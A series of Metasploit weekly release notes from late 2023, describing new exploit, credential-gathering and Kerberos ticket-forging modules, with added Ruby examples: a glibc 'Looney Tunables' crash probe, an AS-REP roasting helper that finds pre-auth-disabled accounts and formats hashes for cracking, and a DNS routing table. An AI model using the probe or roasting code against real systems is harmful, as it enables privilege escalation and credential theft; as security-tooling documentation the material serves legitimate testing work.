Authors: Qualys Threat Research Unit, blasty, and jheysel-r7
Type: Exploit
Pull request: #18541 contributed by jheysel-r7
Path: linux/local/glibc_tunables_priv_esc

Description: This adds an exploit module for the "Looney Tunables" Linux LPE, identified as CVE-2023-4911. It checks the version of glibc running on the target to make sure it is vulnerable and, once verified, it drops a python script that exploits the vulnerability and returns a session running in the context of the root user.
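The module above checks the glibc version; the check a practitioner usually wants first is the crash probe from the Qualys advisory, because distributions backport the fix without changing the glibc version string. The Ruby below is an added example and not the module’s code: it wraps the advisory’s probe (a duplicated tunable name in GLIBC_TUNABLES plus a long unrelated variable, run with an otherwise empty environment) and interprets the exit status, with a version-range triage as a secondary hint. The binary path, the function names and the affected-range helper are assumptions of this example.

```ruby
# Added example, not the exploit module's code. The probe is the segfault test
# from the Qualys advisory for CVE-2023-4911: ld.so parses GLIBC_TUNABLES before
# main(), so a vulnerable glibc overflows and the process dies with SIGSEGV,
# while a fixed glibc simply rejects the malformed tunable.

# Environment the advisory uses; Z mirrors the shell's `printf '%08192x' 1`.
def looney_probe_env
  {
    'GLIBC_TUNABLES' => 'glibc.malloc.mxfast=glibc.malloc.mxfast=A',
    'Z' => format('%08192x', 1)
  }
end

# Runs `bin --help` with only the probe variables in its environment (env -i).
# Returns :crashed (very likely vulnerable), :survived (patched, or not glibc)
# or :missing if the binary cannot be executed.
def looney_probe(bin = '/usr/bin/su')
  pid = Process.spawn(looney_probe_env, bin, '--help',
                      unsetenv_others: true,
                      in: File::NULL, out: File::NULL, err: File::NULL)
  _, status = Process.wait2(pid)
  return :crashed if status.signaled? && status.termsig == Signal.list['SEGV']
  :survived
rescue Errno::ENOENT, Errno::EACCES
  :missing
end

# Version triage only (assumption of this example, not the module's logic):
# the bug was introduced in glibc 2.34 and is present through 2.38. Backports
# mean a hit here still has to be confirmed with the probe.
def glibc_version_in_affected_range?(version)
  major, minor = version.split('.').first(2).map(&:to_i)
  major == 2 && (34..38).cover?(minor)
end

if $PROGRAM_NAME == __FILE__
  puts "version 2.35 in affected range: #{glibc_version_in_affected_range?('2.35')}"
  puts "probe result: #{looney_probe}"
end
```

Run it on the target itself (or point looney_probe at any dynamically linked binary); a :crashed result is the signal that the local exploit module is worth attempting, while :survived on a version inside the range usually means a backported fix.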

Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)

Authors: jheysel-r7
Type: Exploit
Pull request: #18566 contributed by jheysel-r7
Path: multi/http/atlassian_confluence_unauth_backup

Description: This adds an exploit module for CVE-2023-22518, an Improper Authorization vulnerability in Confluence which allows an attacker to upload and restore a .zip backup file containing a known user name and password. The attacker can then log in with the credentials from the backup file to gain administrative access to the server.

Enhancements and features (2)

  • #18622 from zeroSteiner – Updates the auxiliary/scanner/dcerpc/petitpotam module to work with newer Windows Server releases.
  • #18623 from gardnerapp – This updates the file handling of the generate command’s -o parameter to expand file system paths.

Bugs fixed (1)

Documentation added (1)

  • #18477 from AleksaZatezalo – This adds documentation for the auxiliary/scanner/nessus/nessus_rest_login module.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/12/15/metasploit-weekly-wrap-up-38/

Continuing the 12th Labor of Metasploit

Metasploit continues its Herculean task of increasing our toolset to tame Kerberos by adding support for AS_REP Roasting, which allows retrieving the password hashes of users who have Do not require Kerberos preauthentication set on the domain controller. The setting is disabled by default, but it is enabled in some environments.

Attackers can request the hash for any user with that option enabled, and worse (or better?) you can query the DC to determine which accounts have this setting, so not only can you get these hashes, the DC will tell you which users are vulnerable to the attack. Metasploit’s AS_REP roasting module will both gather the users and pull the authentication information, or pull information on a select set of users.

Ticket Management

This week’s release includes a brand new post module for enumerating and dumping Kerberos tickets from a compromised Windows host. This module will copy all of the tickets that are accessible at the current privilege level to Metasploit’s own cache, where they can then be used in a Pass-The-Ticket (PTT) style attack. This notably enables Metasploit users to execute the entire workflow necessary to exploit Unconstrained Delegation from within Metasploit; there is even new documentation which outlines the entire process.

New module content (3)

Find Users Without Pre-Auth Required (ASREP-roast)

Author: smashery
Type: Auxiliary
Pull request: #18569 contributed by smashery
Path: gather/asrep

Description: This adds a module to gather credential material from accounts with "Requires Pre-Authentication" disabled. The module supports two mechanisms for finding candidate accounts, brute forcing from a list of usernames or an LDAP query for accounts with the flag set, followed by requesting TGTs for them.
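To make the two mechanisms described above, and the DC query mentioned in the intro, concrete: the Ruby below is an added example, not the gather/asrep module’s code. It builds the LDAP filter that asks the DC which accounts have "Do not require Kerberos preauthentication" set (the UF_DONT_REQUIRE_PREAUTH bit of userAccountControl, tested with the bitwise-AND matching rule), applies the same bit test to directory entries already in hand, and formats the enc-part of an AS-REP into the hashcat mode 18200 line used for offline cracking of RC4 (etype 23) responses. The directory entries and the 20-byte enc-part are constructed sample data.

```ruby
# Added example (not the gather/asrep module's code): how roastable accounts are
# identified and how an AS-REP is turned into crackable material.

# userAccountControl bit set by "Do not require Kerberos preauthentication".
UF_DONT_REQUIRE_PREAUTH = 0x400000 # decimal 4194304

# LDAP filter using the LDAP_MATCHING_RULE_BIT_AND extensible match
# (OID 1.2.840.113556.1.4.803), which tests one bit of the integer attribute
# server-side so the DC returns only accounts with the flag set.
def asrep_ldap_filter
  "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=#{UF_DONT_REQUIRE_PREAUTH}))"
end

# The same bit test applied locally to entries already read from the directory.
# entries: array of { sam: 'sAMAccountName', uac: Integer }
def roastable_accounts(entries)
  entries.select { |e| (e[:uac] & UF_DONT_REQUIRE_PREAUTH) != 0 }.map { |e| e[:sam] }
end

# Format the AS-REP enc-part for hashcat mode 18200 (Kerberos 5 etype 23 AS-REP).
# For RC4-HMAC the first 16 bytes of the ciphertext are the HMAC-MD5 checksum and
# the remainder is the encrypted data; crackers expect them separated by '$'.
def asrep_hashcat_line(user, realm, enc_part)
  raise ArgumentError, 'enc-part too short' unless enc_part.bytesize > 16
  checksum = enc_part.byteslice(0, 16).unpack1('H*')
  edata    = enc_part.byteslice(16, enc_part.bytesize - 16).unpack1('H*')
  "$krb5asrep$23$#{user}@#{realm}:#{checksum}$#{edata}"
end

# Constructed directory entries, not real accounts: NORMAL_ACCOUNT (0x200),
# DONT_EXPIRE_PASSWORD (0x10000), and the pre-auth flag set on two of them.
SAMPLE_ENTRIES = [
  { sam: 'svc_backup', uac: 0x200 | UF_DONT_REQUIRE_PREAUTH },
  { sam: 'alice',      uac: 0x200 },
  { sam: 'bob',        uac: 0x200 | 0x10000 | UF_DONT_REQUIRE_PREAUTH }
].freeze

# Constructed 20-byte enc-part stand-in; a real RC4 enc-part is a few hundred bytes.
SAMPLE_ENC_PART = ("\x00".b * 16) + ("\xff".b * 4)

if $PROGRAM_NAME == __FILE__
  puts asrep_ldap_filter
  puts roastable_accounts(SAMPLE_ENTRIES).inspect
  puts asrep_hashcat_line('svc_backup', 'CORP.LOCAL', SAMPLE_ENC_PART)
end
```

Two caveats for use: responses with AES enc-parts (etype 17/18) use a different hashcat mode and line format, so check the etype before formatting; and on the defensive side, each request the module makes shows up on the DC as a Kerberos authentication ticket (TGT) request event (4768) with pre-authentication type 0, which is the simplest detection for this technique.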

Splunk Authenticated XSLT Upload RCE

Authors: Valentin Lobstein, h00die, and nathan
Type: Exploit
Pull request: #18577 contributed by Chocapikk
Path: unix/http/splunk_xslt_authenticated_rce

Description: This PR adds a Remote Code Execution (RCE) module for Splunk Enterprise using CVE-2023-46214. This module exploits a vulnerability in the XSLT transformation functionality of certain versions of Splunk Enterprise, allowing for authenticated remote code execution.

Kerberos Ticket Management

Authors: Spencer McIntyre and Will Schroeder
Type: Post
Pull request: #18488 contributed by zeroSteiner
Path: windows/manage/kerberos_tickets

Description: This PR adds a module to manage Kerberos tickets from a compromised host. This notably allows Kerberos tickets to be exported from the target and then added to Metasploit’s own cache, allowing them to be used for the duration in which they are valid.

Enhancements and features (3)

  • #18539 from dwelch-r7 – This adds a new session type for SMB sessions. The smb session is behind a feature flag and can be enabled by setting features set smb_session_type true in msfconsole.
  • #18598 from bwatters-r7 – This bumps the Metasploit-payload version to bring in one fix and one enhancement. The fix is to standardize the behavior of Java Meterpreter to only listen on IPv4 interfaces when binding to 0.0.0.0. The enhancement is to better align pretty OS names on Windows for Windows Kernel 10 releases, AKA Windows Server 2016-present or Windows 10/11+.
  • #18601 from MikeAnast – Adds arm64 support to Metasploit’s Dockerfile. This new image is available from Dockerhub via docker pull metasploitframework/metasploit-framework:6.3.47 or through the wrapper script ./docker/bin/msfconsole.

Bugs fixed (4)

  • #18606 from Lorenyx – rpc_plugin has been updated to correctly use the provided plugin options.
  • #18609 from adfoster-r7 – This fixes an issue in the cmd/windows/powershell/download_exec payload module that was preventing it from executing correctly due to an architecture check.
  • #18613 from dwelch-r7 – Ensures that after listing files within an SMB directory that the handle is closed.
  • #18614 from sjanusz-r7 – Fixes a crash in the auxiliary/scanner/ssh/ssh_identify_pubkeys module, as well as adding new module documentation.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Metasploit Wrap-Up 12/8/2023

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/12/08/metasploit-wrap-up-12-8-2023/

Are You Looking for ACTION?

Our very own adfoster-r7 has added a new feature that adds module actions, targets, and aliases to the search feature in Metasploit Framework. As we continue to add modules with diverse goals or targets, we’ve found ourselves leaning on these flags more and more recently, and this change will help users better locate the modules that let them do what they want.

Right now, the feature is behind a feature flag as we work out how to make it as user-friendly as possible. If you would like to use it, turn on the feature by running features set hierarchical_search_table true. Please let us know how it works for you!

New module content (2)

ownCloud Phpinfo Reader

Authors: Christian Fischer, Ron Bowes, creacitysec, h00die, and random-robbie
Type: Auxiliary
Pull request: #18591 contributed by h00die
Path: gather/owncloud_phpinfo_reader

Description: This adds an auxiliary module for CVE-2023-49103 which can extract sensitive environment variables from ownCloud targets including ownCloud, DB, Redis, SMTP, and S3 credentials.

Docker cgroups Container Escape

Authors: Kevin Wang, T1erno, Yiqi Sun, and h00die
Type: Exploit
Pull request: #18578 contributed by h00die
Path: linux/local/docker_cgroup_escape

Description: This adds a new module to exploit CVE-2022-0492, a docker escape for root on the host OS.

Enhancements and features (5)

  • #17667 from h00die – Makes various performance and output readability improvements to Metasploit’s password cracking functionality. Now, hash types without a corresponding hash are skipped, invalid hashes are no longer output, cracking stops for a hash type when there are no hashes left, and empty tables are no longer printed. Other changes include support for Hashcat’s username functionality, a new quiet option, and documentation updates to the wiki.
  • #18446 from zeroSteiner – This makes the DomainControllerRhost option optional, even when the authentication mode is set to Kerberos. It does so by looking up the Kerberos server using the SRV records that Active Directory publishes by default for the specified realm.
  • #18463 from h00die-gr3y – This updates the linux/upnp/dlink_upnp_msearch_exec exploit module to be more generic and adds advanced detection logic (a check method). The module leverages a command injection vulnerability that exists in multiple D-Link network products, allowing an attacker to inject arbitrary commands into the UPnP service via a crafted M-SEARCH packet. This also deprecates the modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi module, which uses the same attack vector and can be replaced by this updated module.
  • #18570 from adfoster-r7 – Updates Metasploit’s Docker ruby version from 3.0.x to 3.1.x.
  • #18581 from adfoster-r7 – Adds hierarchical search table support to Metasploit’s search command functionality. The search table now includes a module’s actions, targets, and alias metadata. This functionality requires the user to opt-in with the command features set hierarchical_search_table true.
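The SRV lookup that #18446 relies on is easy to reproduce outside the framework. The Ruby below is an added example, not Metasploit’s implementation: it builds the _kerberos._tcp.<realm> name that Active Directory registers for its KDCs, orders SRV answers by priority and weight (deterministically here; RFC 2782 uses weighted random selection within a priority), and performs the live query with the standard library resolver. The record set used in the ordering demonstration is constructed.

```ruby
# Added example (not Metasploit's code): locating a realm's KDCs through the
# SRV records Active Directory publishes by default.
require 'resolv'

# Name AD registers for the realm's Kerberos service (TCP port 88 by default).
def kerberos_srv_name(realm)
  "_kerberos._tcp.#{realm.downcase}"
end

# Orders SRV records: lowest priority first, heavier weight preferred within a
# priority, target name as a stable tie-breaker. Deterministic stand-in for the
# weighted random choice RFC 2782 describes.
def order_kdcs(records)
  records.sort_by { |r| [r[:priority], -r[:weight], r[:target]] }
end

# Live lookup. Returns [] when the realm publishes nothing; pair it with the
# dns command's rules so the query goes to the target's own DNS server.
def discover_kdcs(realm, resolver: Resolv::DNS.new)
  answers = resolver.getresources(kerberos_srv_name(realm), Resolv::DNS::Resource::IN::SRV)
  order_kdcs(answers.map do |a|
    { priority: a.priority, weight: a.weight, port: a.port, target: a.target.to_s }
  end)
end

# Constructed answer set for an imaginary realm, not a real zone.
SAMPLE_SRV = [
  { priority: 10, weight: 50,  port: 88, target: 'dc2.corp.local' },
  { priority: 0,  weight: 100, port: 88, target: 'dc1.corp.local' },
  { priority: 0,  weight: 100, port: 88, target: 'dc0.corp.local' }
].freeze

if $PROGRAM_NAME == __FILE__
  puts kerberos_srv_name('CORP.LOCAL')
  order_kdcs(SAMPLE_SRV).each { |r| puts "#{r[:target]}:#{r[:port]} (prio #{r[:priority]}, weight #{r[:weight]})" }
end
```

AD also registers the same service under _kerberos._tcp.dc._msdcs.<domain>, which only lists domain controllers; either name works for locating a KDC.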

Bugs fixed (1)

  • #18603 from h00die – Updates the auxiliary/scanner/snmp/snmp_enum and auxiliary/scanner/snmp/snmp_login module metadata to include metadata references to CVE-1999-0516 (guessable SNMP community string) and CVE-1999-0517 (default/null/missing SNMP community string).

Documentation added (1)

  • #18592 from loredous – Fixes a typo in the SMB pentesting documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Metasploit Weekly Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2023/12/01/metasploit-weekly-wrap-up-37/

Customizable DNS resolution

Contributor smashery added a new dns command to the Metasploit console, which allows the user to customize the behavior of DNS resolution. Similar to the route command, it is now possible to specify where DNS requests are sent, so that nothing leaks to a resolver you did not choose. Before these changes, the Framework used the default local system configuration. Now, it is possible to specify which DNS server should be queried based on rules that match specific hostnames or domains. It is also possible to route DNS requests through an existing session, which is useful when querying a DNS server located in an internal network that can only be reached through a pivot host.

The DNS feature must be enabled to make this command available with features set dns_feature true. Then, use dns help to list the default commands:

msf6 > features set dns_feature true
dns_feature => true
msf6 > dns help
Manage Metasploit's DNS resolution behaviour

Usage:
  dns [add] [--session <session_id>] [--rule <wildcard DNS entry>] <IP Address> <IP Address> ...
  dns [remove/del] -i <entry id> [-i <entry id> ...]
  dns [purge]
  dns [print]

Subcommands:
  add - add a DNS resolution entry to resolve certain domain names through a particular DNS server
  remove - delete a DNS resolution entry; 'del' is an alias
  purge - remove all DNS resolution entries
  print - show all active DNS resolution entries

Examples:
  Display all current DNS nameserver entries
    dns
    dns print

  Set the DNS server(s) to be used for *.metasploit.com to 192.168.1.10
    dns add --rule *.metasploit.com 192.168.1.10

  Add multiple entries at once
    dns add --rule *.metasploit.com --rule *.google.com 192.168.1.10 192.168.1.11

  Set the DNS server(s) to be used for *.metasploit.com to 192.168.1.10, but specifically to go through session 2
    dns add --session 2 --rule *.metasploit.com 192.168.1.10

  Delete the DNS resolution rule with ID 3
    dns remove -i 3

  Delete multiple entries in one command
    dns remove -i 3 -i 4 -i 5

  Set the DNS server(s) to be used for all requests that match no rules
    dns add 8.8.8.8 8.8.4.4

Once set up, all name resolution follows these rules. For example, with RHOSTS set to a hostname (set RHOSTS www.example.com) and a rule added with dns add --session 1 --rule *.example.com 10.10.1.1, the Framework resolves the hostname by sending the DNS request to the internal DNS server at 10.10.1.1 through session 1. No other request is sent, so nothing leaks to the local resolver.
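The policy described above (most specific matching rule wins, a rule-less entry acts as the default, and a name that matches nothing is refused rather than handed to the system resolver) is small enough to show in full. The Ruby below is an added example and not Metasploit’s implementation of the dns command; the class and method names, the longest-pattern-wins tie-break, and the assumption that * spans any number of labels are choices of this example.

```ruby
# Added example (not Metasploit's dns command code): a rule table that decides
# which nameservers, and which session, a lookup may use. Entries with a
# pattern are rules; an entry without one is the default for unmatched names.
class DnsRuleTable
  Entry = Struct.new(:id, :pattern, :servers, :session)

  def initialize
    @entries = []
    @next_id = 1
  end

  # servers: one or more nameserver IPs; rule: '*.example.com' style wildcard
  # or nil for the default entry; session: optional session id to tunnel through.
  def add(servers, rule: nil, session: nil)
    entry = Entry.new(@next_id, rule, Array(servers), session)
    @entries << entry
    @next_id += 1
    entry.id
  end

  def remove(*ids)
    @entries.reject! { |e| ids.include?(e.id) }
  end

  def purge
    @entries.clear
  end

  # Returns { servers:, session: } for hostname, or raises when no rule and no
  # default applies: the request is refused instead of leaking to the local resolver.
  def route_for(hostname)
    host = hostname.downcase.chomp('.')
    matches = @entries.select { |e| e.pattern && match?(e.pattern, host) }
    # Most specific rule wins: longest pattern, then the earliest added.
    best = matches.max_by { |e| [e.pattern.length, -e.id] }
    best ||= @entries.find { |e| e.pattern.nil? }
    raise "refusing to resolve #{hostname}: no rule and no default nameserver" unless best
    { servers: best.servers, session: best.session }
  end

  private

  # '*' stands for any run of characters, dots included, so '*.example.com'
  # covers any depth of subdomain (assumption of this example); case-insensitive.
  def match?(pattern, host)
    re = Regexp.new('\A' + Regexp.escape(pattern.downcase).gsub('\*', '.*') + '\z')
    re.match?(host)
  end
end

if $PROGRAM_NAME == __FILE__
  table = DnsRuleTable.new
  table.add('10.10.1.1', rule: '*.example.com', session: 1)
  table.add(%w[8.8.8.8 8.8.4.4])
  p table.route_for('www.example.com')   # internal server through session 1
  p table.route_for('www.metasploit.com') # default servers, no session
end
```

The refusal path is the security-relevant part: with the default entry omitted, a typo in RHOSTS or a module resolving an unexpected name fails loudly instead of sending the target's hostname to whatever resolver the operator's machine happens to use.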

Tickets in the sky with diamond

Smashery also enhanced the existing Kerberos ticket-forging module and added support for the Diamond and Sapphire techniques, which are similar to Golden and Silver Tickets but stealthier. The Diamond technique takes a real TGT issued by the KDC and modifies its PAC, which requires the krbtgt Kerberos key to be known. The Sapphire technique uses S4U2Self and U2U (User-to-User) to obtain the PAC of another user and splices it into an existing TGT in order to impersonate that user.

New module content (1)

WordPress Royal Elementor Addons RCE

Authors: Fioravante Souza and Valentin Lobstein
Type: Exploit
Pull request: #18567 contributed by Chocapikk
Path: multi/http/wp_royal_elementor_addons_rce

Description: This pull request adds a new exploit module for CVE-2023-5360, an unauthenticated file upload vulnerability in the WordPress Royal Elementor Addons and Templates plugin in versions before 1.3.79.

Enhancements and features (5)

  • #18526 from smashery – This adds a new dns command in Metasploit, to allow the user to customize the behavior of DNS resolution in the framework. DNS resolution can be set to be routed through a session via a specific Comm channel or to request a specific DNS server. Routing rules ensure DNS queries are not sent to unwanted DNS servers and avoid the leak of information.
  • #18560 from smashery – This updates the existing Kerberos ticket-forging module with new actions for forging tickets with fields copied from ones issued by the legitimate KDC using the Diamond and Sapphire techniques.
  • #18565 from zeroSteiner – This adds an enhancement to adjust the kerberos cache lookup logic. If no TGT for the specific host is found, it will try again but with any host. This fixes the workflow where a user can currently forge a golden ticket, but that ticket will not be automatically used for authentication by other services. This will also fix the future issue of the TGT that’s created by the Diamond and Sapphire techniques.
  • #18571 from smashery – Improves the error messages shown to users if there is a validation error with a module’s RHOST datastore values. Now, the user is notified when there is a failure with parsing a URL, invalid CIDR, or DNS resolution failure.
  • #18580 from adfoster-r7 – Metasploit modules developed using Python can now provide default_options as part of an exploit.

Bugs fixed (1)

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Metasploit Wrap-up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/11/23/metasploit-wrapup-74/

Enhancements and features (2)

  • #18548 from zeroSteiner – Updates the admin/http/tomcat_ghostcat module to follow newer library conventions.
  • #18552 from adfoster-r7 – Adds support for Ruby 3.3.0-preview3.

Bugs fixed (5)

  • #18448 from HynekPetrak – Fixes and updates the auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass module to use renamed NEW_USERNAME and NEW_PASSWORD options.
  • #18538 from adfoster-r7 – Fixes an intermittent stream closed in another thread crash when booting msfconsole.
  • #18547 from adfoster-r7 – This fixes an issue in the platform detection used by the SSH login modules that was causing certain Windows environments to be incorrectly fingerprinted.
  • #18558 from zeroSteiner – Fixes a crash in the post/windows/gather/enum_chrome module which can be used to decrypt passwords stored by the user in Chrome.
  • #18564 from zeroSteiner – Fixes a module crash when running the auxiliary/server/capture/http module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/11/17/metasploit-weekly-wrap-up-36/

Possible Web Service Removal

Metasploit has support for running with a local database, or from a remote web service which can be initialized with msfdb init --component webservice. Future versions of Metasploit Framework may remove the msfdb remote webservice. Users that leverage this functionality are invited to react on an issue currently on GitHub to inform the maintainers that the feature is used.

New module content (1)

ZoneMinder Snapshots Command Injection

Authors: UnblvR and whotwagner
Type: Exploit
Pull request: #18434 contributed by whotwagner
Path: unix/webapp/zoneminder_snapshots

Description: This PR adds an exploit module for an unauthenticated remote code execution vulnerability in the video surveillance software Zoneminder (CVE-2023-26035).

Enhancements and features (1)

  • #18440 from adfoster-r7 – This alerts users that the remote web service will be removed. It prompts them to respond to an issue on GitHub if the removal will affect them.

Bugs fixed (1)

Documentation added (1)

  • #18524 from bradyjackson – Updates the modules/payload/android/meterpreter/reverse_tcp.md example to use the correct flags when generating a payload.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/11/10/metasploit-weekly-wrap-up-35/

Apache MQ and Three Cisco Modules in a Trenchcoat

This week’s release has a lot of new content and features modules targeting two major recent vulnerabilities that have received a great deal of attention: CVE-2023-46604 in Apache ActiveMQ, which has been exploited in the wild to deploy ransomware, and CVE-2023-20198 in Cisco IOS XE.

New module content (8)

Cisco IOS-XE unauthenticated Command Line Interface (CLI) execution

Author: sfewer-r7
Type: Auxiliary
Pull request: #18507 contributed by sfewer-r7
Path: admin/http/cisco_ios_xe_cli_exec_cve_2023_20198

Description: This PR adds three modules: auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 leverages CVE-2023-20198 to perform unauthenticated remote CLI command execution, module auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273 leverages both CVE-2023-20198 and CVE-2023-20273 to perform unauthenticated remote OS command execution, and exploit/linux/misc/cisco_ios_xe_rce uses the same two vulnerabilities to run an arbitrary payload on the target.

MagnusBilling application unauthenticated Remote Command Execution.

Authors: Eldstal and h00die-gr3y
Type: Exploit
Pull request: #18481 contributed by h00die-gr3y
Path: linux/http/magnusbilling_unauth_rce_cve_2023_30258

Description: This adds an exploit module that leverages CVE-2023-30258, a command injection vulnerability in MagnusBilling versions 6 and 7 that allows unauthenticated remote code execution in the context of the user running the web server process.

Apache ActiveMQ Unauthenticated Remote Code Execution

Authors: X1r0z and sfewer-r7
Type: Exploit
Pull request: #18501 contributed by sfewer-r7
Path: multi/misc/apache_activemq_rce_cve_2023_46604

Description: This pull request is an exploit module for CVE-2023-46604, affecting the OpenWire transport unmarshaller in Apache ActiveMQ.

AjaxPro Deserialization Remote Code Execution

Authors: Hans-Martin Münch (MOGWAI LABS) and Jemmy Wang
Type: Exploit
Pull request: #18494 contributed by Jemmy1228
Path: windows/http/ajaxpro_deserialization_rce

Description: This PR adds an RCE module for AjaxPro which leverages insecure deserialization of attacker-supplied data to get remote code execution on the target OS in the context of the user running the website that uses AjaxPro.

Apache NiFi Credentials Gather

Authors: Topaco and h00die
Type: Post
Pull request: #18503 contributed by h00die
Path: linux/gather/apache_nifi_credentials

Description: This PR adds a post module to steal config and credential information for Apache NiFi.

Windows Gather PL/SQL Developer Connection Credentials

Authors: Adam Caudill and Jemmy Wang
Type: Post
Pull request: #18491
Path: windows/gather/credentials/plsql_developer

Description: Unable to find PR information, please complete manually

Enhancements and features (3)

  • #18218 from gardnerapp – This PR reduces the number of requests the Windows checkvm post module sends to the host when attempting to determine what hypervisor the session is running in by saving the initial responses in instance variables for later use in the module. The PR also includes many other general code improvements.
  • #18379 from dwelch-r7 – This PR improves the Kerberos service authenticator hostname matching for ccache credentials. Prior to this change the service authenticator was filtering out valid credentials when the hostname wasn’t an exact match, even though credentials for a domain (e.g. windomain.local) should work on a host within it (e.g. dc.windomain.local).
  • #18504 from h00die – Updates the auxiliary/scanner/http/grafana_plugin_traversal module to include a disclosure date and a link to the original disclosure blog post.

Bugs fixed (1)

  • #18506 from zeroSteiner – This PR fixes a stability issue with the f5_bigip_tmui_rce_cve_2023_46747 module. Prior to this fix, occasionally the module would fail on login as things were running too quickly. The module now retries logging in if the first attempt fails.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2023/11/03/metasploit-weekly-wrap-up-34/

PTT for DCSync

This week, community member smashery made an improvement to the windows_secrets_dump module to enable it to dump domain hashes using the DCSync method after having authenticated with a Kerberos ticket. Now, if a user has a valid Kerberos ticket for a privileged account, they can run the windows_secrets_dump module with the DOMAIN action and obtain the desired information. No password required. This is particularly useful in workflows involving the exploitation of AD/CS, using the ESC family of techniques.

New module content (2)

Citrix ADC (NetScaler) Bleed Scanner

Authors: Dylan Pindur and Spencer McIntyre
Type: Auxiliary
Pull request: #18492 contributed by zeroSteiner
Path: scanner/http/citrix_bleed_cve_2023_4966

Description: This adds a scanner module for exploiting CVE-2023-4966, a memory disclosure in Citrix ADC (NetScaler) appliances. The vulnerability allows a remote, unauthenticated attacker to leak memory contents by sending a very large HTTP Host header. The leaked memory is then scanned for session cookies, which can be used to hijack the corresponding sessions if found.

F5 BIG-IP TMUI AJP Smuggling RCE

Authors: Michael Weber, Sandeep Singh, Spencer McIntyre, and Thomas Hendrickson
Type: Exploit
Pull request: #18497 contributed by zeroSteiner
Path: linux/http/f5_bigip_tmui_rce_cve_2023_46747

Description: This module exploits a flaw in F5’s BIG-IP Traffic Management User Interface (TMUI) that enables an external, unauthenticated attacker to create an administrative user. The attacker can then use the admin user to execute arbitrary code in the context of the root user.

Enhancements and features (3)

  • #18386 from e-lliot – This adds the lmkdir command to Meterpreter, which creates a directory on the local host.
  • #18441 from sjanusz-r7 – Adds at rest encryption to Meterpreter payloads on the Metasploit host machine’s file system.
  • #18419 from smashery – This updates the windows_secrets_dump module’s DCSync technique (the DOMAIN action) to use Kerberos tickets for authentication. Users can now use Kerberos tickets for authentication with all actions in the module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).